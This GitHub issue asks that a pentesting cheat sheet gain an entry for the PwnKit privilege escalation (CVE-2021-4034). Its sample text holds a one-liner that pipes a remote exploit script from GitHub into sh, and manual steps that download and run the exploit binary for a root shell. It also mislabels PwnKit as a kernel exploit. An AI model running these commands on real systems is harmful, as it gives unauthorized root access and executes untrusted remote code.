-
Notifications
You must be signed in to change notification settings - Fork 2
Open
Description
Is your feature request related to a problem? Please describe.
The section Common Kernel Exploits is missing the PwnKit (CVE-2021-4034) kernel exploit
Describe the solution you'd like
Include the PwnKit exploit in the cheat sheet. Sample text:
# PwnKit (CVE-2021-4034) - All PolKit versions earlier than version 121
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" # Automatic exploit
# Manual exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
Describe alternatives you've considered
Speaking to the author over teams, to which he laughed.
Additional context
PwnKit Proof of Concept
CVE-2021-4034 Details
Metadata
Metadata
Assignees
Labels
No labels